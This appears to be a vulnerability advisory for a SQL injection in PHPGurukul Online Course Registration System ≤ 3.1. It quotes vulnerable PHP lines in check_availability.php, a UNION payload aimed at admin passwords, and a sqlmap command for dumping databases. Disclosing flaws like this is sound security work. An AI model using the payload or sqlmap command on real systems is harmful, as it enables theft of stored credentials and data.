Logo Title: SQL Injection Vulnerability in PHPGurukul Online Course Registration System ≤ 3.1

Title: SQL Injection Vulnerability in PHPGurukul Online Course Registration System ≤ 3.1

Title: SQL Injection Vulnerability in PHPGurukul Online Course Registration System ≤ 3.1

BUG_Author: angelkate

Affected Version: PHPGurukul Online Course Registration System ≤ 3.1

Vendor: PHPGurukul

Software: Online Course Registration System

Vulnerability Files:

  • /onlinecourse/check_availability.php

Description:

  1. SQL Injection via Course Availability Check:

    • In the file /onlinecourse/check_availability.php, the cid POST parameter is directly concatenated into multiple SQL queries without any sanitization.

    • This vulnerability exists in 3 different SQL queries within the same file.

    Article Image

     

  2. Vulnerable Code - Line 6:

    $cid= $_POST["cid"];
    $result =mysqli_query($con,"SELECT studentRegno FROM courseenrolls WHERE course='$cid' and studentRegno=' $regid'");

  3. Vulnerable Code - Line 17:

    $result =mysqli_query($con,"SELECT * FROM courseenrolls WHERE course='$cid'");

  4. Vulnerable Code - Line 19:

    $result1 =mysqli_query($con,"SELECT noofSeats FROM course WHERE id='$cid'");

  5. Exploiting the SQL Injection:

    • By injecting SQL commands into the cid parameter, an attacker can extract sensitive data from the database.

  6. Example SQL Injection Payload:

    cid=1' UNION SELECT password FROM admin--

Proof of Concept:

  1. Login as student and access the course enrollment page

    http://localhost/enroll.php
    Article Image
    Article Image

  2. SQLMap exploitation:

    sqlmap -u "http://<target-ip>/check_availability.php" --data="cid=1" --cookie="PHPSESSID=xxx" --dbs
Article Image
Article Image
Article Image